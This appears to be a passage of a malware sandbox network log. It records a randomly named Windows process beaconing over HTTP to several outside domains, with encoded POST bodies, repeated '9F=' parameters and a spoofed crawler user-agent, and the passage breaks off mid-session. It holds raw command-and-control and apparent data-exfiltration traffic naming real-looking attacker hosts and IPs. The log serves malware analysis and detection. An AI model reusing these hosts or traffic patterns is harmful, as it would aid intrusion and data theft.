FzH7kMk/Wi1l9wPzuPP+ObGxyspZ057okvd3B71MJqavYwFAfveB8CaMbi3/yvLF//gvOO7Zmjk3ymKSkx2IHkQVVzrTq4Z7zao6PW5/43WGfvIseMV0eun8S1V1g1fX3LvFdhbfEXIDCGyhEpqxNzVOYZTfNEKHAvVWHACAvOmyBCzLrOeH+F+apxEE3sKMzzwlBLiafnSbJgMdgitbJyiteldsG7If52kzceVSiQhZGgg743cYnMeU11m+WfJmg1bOscx3G011A9qCuOOfXbxyUww5stPxzoiVUunqrNM2BfioLtAvX8s52O9N+W613DW [TRUNCATED]
Jan 11, 2025 01:55:40.926513910 CET	914	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=jQd3hysPqZSmmBpi; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 01:15:40 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 01:15:40 GMT Set-Cookie: __ddg10_=1736556940; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 01:15:40 GMT Set-Cookie: __ddg1_=VX2Pv7wMrz1oPrUyqNwP; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 00:55:40 GMT date: Sat, 11 Jan 2025 00:55:40 GMT content-type: text/html; charset=iso-8859-1 content-length: 235 location: https://www.newbh.pro/fpja/ x-host: www.newbh.pro x-tilda-server: 31 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49981	176.57.65.76	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:42.661506891 CET	424	OUT	GET /fpja/?9F=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&wtE0B=1LjxZz HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.newbh.pro Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 01:55:43.316428900 CET	914	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=hFDg0jLxhKrDfHKW; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 01:15:43 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 01:15:43 GMT Set-Cookie: __ddg10_=1736556943; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 01:15:43 GMT Set-Cookie: __ddg1_=s6D7kwJsCyQYd0kXioWd; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 00:55:43 GMT date: Sat, 11 Jan 2025 00:55:43 GMT content-type: text/html; charset=iso-8859-1 content-length: 235 location: https://www.newbh.pro/fpja/ x-host: www.newbh.pro x-tilda-server: 26 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49982	209.74.79.41	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:48.447638988 CET	686	OUT	POST /b0aw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.thinkone.xyz Origin: http://www.thinkone.xyz Referer: http://www.thinkone.xyz/b0aw/ Content-Length: 215 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 59 4d 47 59 75 52 61 68 39 6f 31 35 72 58 54 4b 53 72 51 54 44 59 4c 53 63 62 51 4a 58 57 71 6f 6d 41 53 72 53 38 74 71 72 59 4c 39 6d 39 34 70 5a 4d 56 63 76 73 55 67 47 53 45 75 4a 2f 77 54 54 38 35 31 49 74 49 49 47 6c 33 69 76 59 44 44 43 77 47 38 56 37 48 4e 4a 68 6b 43 71 4c 67 41 6c 71 74 38 42 66 68 64 59 61 36 51 79 63 71 6a 65 63 6f 6d 49 4b 71 48 71 38 5a 41 71 79 6d 4b 49 37 2f 59 6e 4e 70 79 30 49 6d 38 65 32 70 58 4b 6b 38 73 7a 41 4b 74 76 54 69 75 69 53 38 4d 75 4a 47 52 67 4b 62 67 75 6a 70 56 71 69 38 74 6a 4c 32 4d 4c 52 32 4b 44 45 55 45 51 71 41 34 39 42 69 2f 6f 75 36 48 4d 58 53 32 35 56 5a 6c 6c 67 3d 3d Data Ascii: 9F=YMGYuRah9o15rXTKSrQTDYLScbQJXWqomASrS8tqrYL9m94pZMVcvsUgGSEuJ/wTT851ItIIGl3ivYDDCwG8V7HNJhkCqLgAlqt8BfhdYa6QycqjecomIKqHq8ZAqymKI7/YnNpy0Im8e2pXKk8szAKtvTiuiS8MuJGRgKbgujpVqi8tjL2MLR2KDEUEQqA49Bi/ou6HMXS25VZllg==
Jan 11, 2025 01:55:49.013072014 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:55:48 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49983	209.74.79.41	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:50.990367889 CET	706	OUT	POST /b0aw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.thinkone.xyz Origin: http://www.thinkone.xyz Referer: http://www.thinkone.xyz/b0aw/ Content-Length: 235 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 59 4d 47 59 75 52 61 68 39 6f 31 35 70 30 37 4b 51 4b 51 54 55 6f 4c 54 54 37 51 4a 42 6d 71 6b 6d 41 57 72 53 2f 68 63 6f 72 76 39 6d 5a 30 70 59 4e 56 63 73 73 55 67 54 69 45 76 4b 50 77 59 54 38 30 43 49 76 63 49 47 6b 54 69 76 5a 7a 44 44 48 53 7a 58 72 48 50 46 42 6b 4d 67 72 67 41 6c 71 74 38 42 66 6c 7a 59 65 57 51 79 70 36 6a 66 39 6f 35 45 71 71 47 6a 63 5a 41 39 69 6d 4f 49 37 2f 36 6e 49 77 70 30 4b 75 38 65 7a 56 58 4a 77 49 72 71 77 4b 76 69 7a 6a 64 6e 51 42 51 75 63 6d 51 71 6f 71 34 76 54 70 71 76 55 39 50 35 70 36 67 56 41 4f 78 48 47 77 79 48 4d 64 4e 2f 41 6d 6e 6c 4d 4f 6d 54 67 33 63 30 48 34 68 7a 58 4e 62 38 63 43 68 62 37 49 77 72 78 45 37 38 58 45 77 69 79 77 3d Data Ascii: 9F=YMGYuRah9o15p07KQKQTUoLTT7QJBmqkmAWrS/hcorv9mZ0pYNVcssUgTiEvKPwYT80CIvcIGkTivZzDDHSzXrHPFBkMgrgAlqt8BflzYeWQyp6jf9o5EqqGjcZA9imOI7/6nIwp0Ku8ezVXJwIrqwKvizjdnQBQucmQqoq4vTpqvU9P5p6gVAOxHGwyHMdN/AmnlMOmTg3c0H4hzXNb8cChb7IwrxE78XEwiyw=
Jan 11, 2025 01:55:51.565603018 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:55:51 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49984	209.74.79.41	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:53.539628983 CET	1719	OUT	POST /b0aw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.thinkone.xyz Origin: http://www.thinkone.xyz Referer: http://www.thinkone.xyz/b0aw/ Content-Length: 1247 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 59 4d 47 59 75 52 61 68 39 6f 31 35 70 30 37 4b 51 4b 51 54 55 6f 4c 54 54 37 51 4a 42 6d 71 6b 6d 41 57 72 53 2f 68 63 6f 72 6e 39 6e 71 38 70 5a 75 74 63 74 73 55 67 50 79 45 79 4b 50 77 2f 54 2f 45 47 49 76 67 59 47 6e 37 69 70 4b 72 44 4b 57 53 7a 64 72 48 50 61 78 6b 4e 71 4c 67 56 6c 70 56 77 42 66 31 7a 59 65 57 51 79 75 43 6a 59 73 6f 35 47 71 71 48 71 38 5a 4d 71 79 6d 71 49 37 6e 41 6e 49 39 63 30 61 4f 38 5a 54 6c 58 47 6a 67 72 6a 77 4b 78 73 54 6a 46 6e 51 4e 35 75 63 54 70 71 74 2f 56 76 55 6c 71 74 46 4a 58 69 72 75 76 57 69 43 45 4f 57 35 55 58 61 4a 37 34 41 6a 52 37 64 32 65 56 68 6e 50 77 6e 77 77 6d 6e 49 62 74 73 57 75 58 72 42 6c 68 78 39 33 35 31 67 4a 2b 32 47 4b 41 52 6a 72 68 41 63 66 71 52 2f 41 59 52 47 55 35 64 79 76 64 42 4c 30 46 2b 63 66 59 4a 53 37 42 66 53 37 70 66 38 50 62 4d 5a 2b 71 48 6c 37 5a 4b 62 4a 30 61 68 79 62 4d 65 67 2f 57 47 4f 30 45 66 36 78 53 45 67 43 75 31 56 6d 6a 6b 41 33 33 41 66 45 6c 34 6d 65 73 4b 37 35 37 35 32 71 35 54 56 70 77 76 [TRUNCATED] Data Ascii: 9F=YMGYuRah9o15p07KQKQTUoLTT7QJBmqkmAWrS/hcorn9nq8pZutctsUgPyEyKPw/T/EGIvgYGn7ipKrDKWSzdrHPaxkNqLgVlpVwBf1zYeWQyuCjYso5GqqHq8ZMqymqI7nAnI9c0aO8ZTlXGjgrjwKxsTjFnQN5ucTpqt/VvUlqtFJXiruvWiCEOW5UXaJ74AjR7d2eVhnPwnwwmnIbtsWuXrBlhx9351gJ+2GKARjrhAcfqR/AYRGU5dyvdBL0F+cfYJS7BfS7pf8PbMZ+qHl7ZKbJ0ahybMeg/WGO0Ef6xSEgCu1VmjkA33AfEl4mesK75752q5TVpwvLtq2GNegI4AyuqZBQvj5sRgvcQH/asTnF5AonDLgC+sAvUWJcaexTYA9MqgdguZfNm2JxH4urLWBTSHV7ybXlftHic4fk/mcUNIhRJ/+N4WYSQ8W6U8eE4LtXzWJQiHVUWFT4mKGXWFi3JG/WVa9YHxeN9zvwGI01EeKD/4B9A1kALfP0hDxGe+3lEj9o4ci4b+FlN8B6qIQlVKekhY6lIMbInPQUK3o2JbB28qjvf9KrvLRBnUWWCy744ZFQdXakU9UPmX69jD+5Q2pDekKQTbuUDiAUDYNbLQ4s2HrPXJSOMVOgbescP1RRmHU6C/4hJc+yVO5YA4YPll9exwiMtxe3ZWdqQ9wZGfvBhNOaOoMOLyQVZYOMlClhsko9k/ntBLrfj7GLF1c57Nx3ji9vCFR13b6+jLpF6xZLVopm5OUlp4lItmLfU56a+Ut8Z7Q/jZVdQUI2+fum6F1pR7SBZsxQKWgMWqGQHxker4NS4mfWDrPvRx0fC1nNee5c0xpyDAwtn8xpSFyk6Hj5VtFXLIlpIQ8NZa2l+fALmeReSMGVrbde3fVb8rW+XXimp0OyWMOE84eUepjFaUoDJO8Or0hfOi6jIRROfsFOY3/x1qZYgXfKdrx1XDuzegvbQvD6prcSLU8KMnhNVkMZKsNAaFRwQ3m9Ck5np [TRUNCATED]
Jan 11, 2025 01:55:54.123730898 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:55:54 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49985	209.74.79.41	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:56.083450079 CET	427	OUT	GET /b0aw/?wtE0B=1LjxZz&9F=VOu4tm+43rVZiGe4K7AcFv6we6IMDB3Zsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLPrvuPSkYs6IWzvZ1It1WQJjP5+KmCtojeJnesOx46iHJS4Dx3Mp7sKKT HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.thinkone.xyz Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 01:55:56.669028997 CET	548	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:55:56 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49986	46.38.243.234	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:01.741216898 CET	680	OUT	POST /ixqi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.mraber.dev Origin: http://www.mraber.dev Referer: http://www.mraber.dev/ixqi/ Content-Length: 215 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 65 50 56 45 59 56 44 6f 70 53 62 79 75 45 54 41 30 33 64 74 73 30 4d 5a 4d 49 72 4c 76 68 77 36 79 37 35 4e 31 35 58 73 5a 49 61 53 2f 6e 4d 65 66 4b 79 55 67 65 6b 42 38 58 6a 48 5a 4f 61 59 59 4c 72 58 63 75 2b 42 61 57 7a 56 6e 37 51 51 5a 75 35 51 46 58 4f 4c 72 73 37 6d 74 36 4f 63 55 48 55 62 52 6f 42 78 51 2f 53 36 69 30 43 50 4b 42 64 45 64 49 6e 6f 37 6c 4f 30 57 48 7a 4d 79 6d 5a 64 6a 68 75 6c 4e 2b 44 6d 33 58 55 37 75 76 74 6e 78 38 37 46 4e 4d 53 73 54 37 4c 33 6c 76 78 72 44 4b 71 63 59 69 76 7a 37 47 57 62 34 54 5a 54 39 4c 73 35 6c 4f 73 55 75 2f 54 75 52 4c 58 65 64 31 5a 4b 41 67 32 44 78 67 45 68 42 41 3d 3d Data Ascii: 9F=ePVEYVDopSbyuETA03dts0MZMIrLvhw6y75N15XsZIaS/nMefKyUgekB8XjHZOaYYLrXcu+BaWzVn7QQZu5QFXOLrs7mt6OcUHUbRoBxQ/S6i0CPKBdEdIno7lO0WHzMymZdjhulN+Dm3XU7uvtnx87FNMSsT7L3lvxrDKqcYivz7GWb4TZT9Ls5lOsUu/TuRLXed1ZKAg2DxgEhBA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49987	46.38.243.234	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:56:04.283231974 CET	700	OUT	POST /ixqi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.mraber.dev Origin: http://www.mraber.dev Referer: http://www.mraber.dev/ixqi/ Content-Length: 235 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 65 50 56 45 59 56 44 6f 70 53 62 79 75 6e 4c 41 79 55 31 74 71 55 4d 65 4a 49 72 4c 6b 42 77 2b 79 37 31 4e 31 34 44 43 46 74 4b 53 2f 43 49 65 65 49 61 55 6a 65 6b 42 76 58 6a 47 64 4f 61 74 59 4c 6e 66 63 73 61 42 61 57 58 56 6e 36 67 51 5a 64 51 69 4b 6e 4f 4a 6b 4d 37 65 77 4b 4f 63 55 48 55 62 52 6f 56 66 51 2f 61 36 69 6e 61 50 46 44 6c 4c 65 49 6e 70 7a 46 4f 30 63 58 7a 49 79 6d 5a 72 6a 67 79 44 4e 34 48 6d 33 57 6b 37 67 62 35 6b 37 38 36 4d 54 38 54 4e 43 59 71 62 67 64 78 70 50 59 36 4a 56 6a 54 6a 7a 51 58 35 69 78 56 2f 6a 61 55 43 68 4d 49 69 35 5a 4f 62 54 4b 54 47 51 58 74 72 66 58 54 70 38 79 6c 6c 58 77 71 69 4f 45 72 7a 4c 79 48 51 6a 36 6c 57 52 51 58 4a 36 76 59 3d Data Ascii: 9F=ePVEYVDopSbyunLAyU1tqUMeJIrLkBw+y71N14DCFtKS/CIeeIaUjekBvXjGdOatYLnfcsaBaWXVn6gQZdQiKnOJkM7ewKOcUHUbRoVfQ/a6inaPFDlLeInpzFO0cXzIymZrjgyDN4Hm3Wk7gb5k786MT8TNCYqbgdxpPY6JVjTjzQX5ixV/jaUChMIi5ZObTKTGQXtrfXTp8yllXwqiOErzLyHQj6lWRQXJ6vY=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49988	46.38.243.234	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
